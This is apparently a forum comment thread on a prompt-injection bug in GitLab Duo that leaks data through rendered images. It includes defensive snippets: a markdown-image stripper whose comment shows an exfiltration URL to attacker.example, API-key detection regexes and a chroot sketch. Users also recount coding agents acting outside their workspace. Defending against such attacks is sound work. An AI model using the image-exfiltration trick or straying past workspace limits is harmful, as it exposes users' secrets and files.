That's not to say that they are employees or perform at that level (they don't), but it is to say that LLM behaviours are fuzzy and ill-defined, like humans'. You can't guarantee that your users won't click on a phishing email – you can train them, you can minimise risk, but ultimately you have to apply a range of solutions together and extend some amount of trust. If we think about LLMs this way, I think the conversation around security will be much more productive.
Why? Output isn't deterministic.
The policy was "we'll do it if the customer asks for it, but we don't recommend it, because the success rate is 100%".
TIL
i think i saw it do it, or try to, and my computer shut down and restarted (mac)
maybe it just deleted the project lol
these llms are really bad at keeping track of the real world, so they might think they're in the project folder when they've actually cd'd back to the user's home directory (~), and so shit happens.
Honestly, one should only run these in controlled environments like VMs or Docker.
but YOLO amirite
Part of this is the tool's fault. Anything like that should be done in a chroot.
Anything less is basically "twitch plays terminal" on your machine.
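Not a full sandbox, but to illustrate the chroot idea, a minimal Python sketch (the jail path is hypothetical, it needs root, and the jail has to be pre-populated with a shell/toolchain plus the project):

    import os, subprocess

    JAIL = "/srv/agent-jail"  # hypothetical path: a minimal rootfs with the project inside

    def enter_jail():
        # Runs in the child just before exec: confine its filesystem view.
        os.chroot(JAIL)
        os.chdir("/")

    # Whatever the agent wants to run now can't see anything outside the jail.
    # Note: chroot alone is containment, not a hard security boundary (root can escape).
    subprocess.run(["/bin/sh", "-c", "rm -rf ./build"], preexec_fn=enter_jail, check=False)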
I haven't had a Cursor install nuke itself yet, but I have had one fiddling in a parent folder it shouldn't have been able to touch with workspace protection on...
Yeah, Claude 4 can go too far sometimes.
The method they presented, if implemented correctly, can apparently stop most prompt injection vectors.
But the reality is I'm very well compensated to summon CRUD slop out of thin air. It's well tested though.
I wish good luck to those who steal my code.
I absolutely am not implying you are one of them, merely that the risk is not the same for all slop CRUD apps universally.
Another interesting fact is that most big vendors pay GitHub to scan for leaked secrets and auto-revoke them if a public repo contains any (regex string matches sk-xxx <- it's a Stripe key).
that's one of the reasons why vendors use unique, greppable API key prefixes with their ID/name in them
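A toy version of that kind of scanner, just to show why the prefixes help (the exact key formats below are approximations, not the vendors' official specs):

    import re

    # Vendor-specific, greppable prefixes keep matches cheap and false positives low.
    # Patterns are illustrative approximations of the real key formats.
    PATTERNS = {
        "stripe": re.compile(r"sk_(?:live|test)_[0-9a-zA-Z]{16,}"),
        "github": re.compile(r"ghp_[0-9a-zA-Z]{36}"),
        "aws":    re.compile(r"AKIA[0-9A-Z]{16}"),
    }

    def scan(text):
        for vendor, pattern in PATTERNS.items():
            for match in pattern.finditer(text):
                yield vendor, match.group(0)

    for vendor, secret in scan("cfg = {'key': 'sk_live_abcdefghij0123456789'}"):
        print("possible %s secret: %s..." % (vendor, secret[:12]))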
And I'm pretty certain that private repos are exempt from the platform's built-in secret scanners because they, too, erroneously think no one can read them without an invitation. Turns out Duo was apparently just silently invited to every repo :-\
good point, the scanner doesn't work on private repos =(
Data leakage via untrusted third-party servers (especially via image rendering) is one of the most common AI AppSec issues, and it's concerning that big vendors do not catch these before shipping.
I built the ASCII Smuggler mentioned in the post and have also documented the image exfiltration vector on my blog in the past, with 10+ findings across vendors.
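For anyone wondering what the defence looks like, a minimal sketch (hypothetical allowlist, deliberately naive markdown matching) of stripping externally hosted images from model output before the client renders it:

    import re
    from urllib.parse import urlparse

    ALLOWED_IMAGE_HOSTS = {"gitlab.com"}  # hypothetical same-origin allowlist

    MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

    def strip_untrusted_images(markdown):
        # An image like ![x](https://attacker.example/log?d=<secrets>) exfiltrates
        # data the moment the client auto-renders it, so drop unknown hosts.
        def check(match):
            host = urlparse(match.group(1)).hostname or ""
            return match.group(0) if host in ALLOWED_IMAGE_HOSTS else ""
        return MD_IMAGE.sub(check, markdown)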
GitHub Copilot Chat had a very similar bug last year.
Reminds me of "Tachy0n: The Last 0day Jailbreak" from yesterday: https://blog.siguza.net/tachy0n/
TLDR: a security issue was found and patched in an OS release; Apple seemingly doesn't do regression testing, so the security researcher did, and found that the bug had somehow become unpatched in later OS releases.
https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP
The first directive, default-src, tells the browser to load only resources that are same-origin with the document, unless other more specific directives set a different policy for other resource types.
The second, img-src, tells the browser to load images that are same-origin or that are served from example.com.
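Concretely, the policy those two quoted directives describe is a single response header; a minimal runnable sketch using Python's stdlib http.server (example.com standing in for whatever image host you actually trust):

    from http.server import BaseHTTPRequestHandler, HTTPServer

    CSP = "default-src 'self'; img-src 'self' example.com"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = b"<img src='https://example.com/x.png'>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            # The browser will now refuse to load images from any other origin.
            self.send_header("Content-Security-Policy", CSP)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

    HTTPServer(("127.0.0.1", 8000), Handler).serve_forever()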
But that wouldn't stop the AI from writing dangerous instructions in plain text to the human.

Does that mean the minute there is a vulnerability on another gitlab.com URL (like an open redirect), this vulnerability is back on the table?
I mean, most coders are bad at security, and we feed that into LLMs, so no surprise.
You also can’t just fix it by saying “make it secure plz”.
If you don’t know enough to identify a security issue yourself, you don’t know enough to know if the LLM caught them all.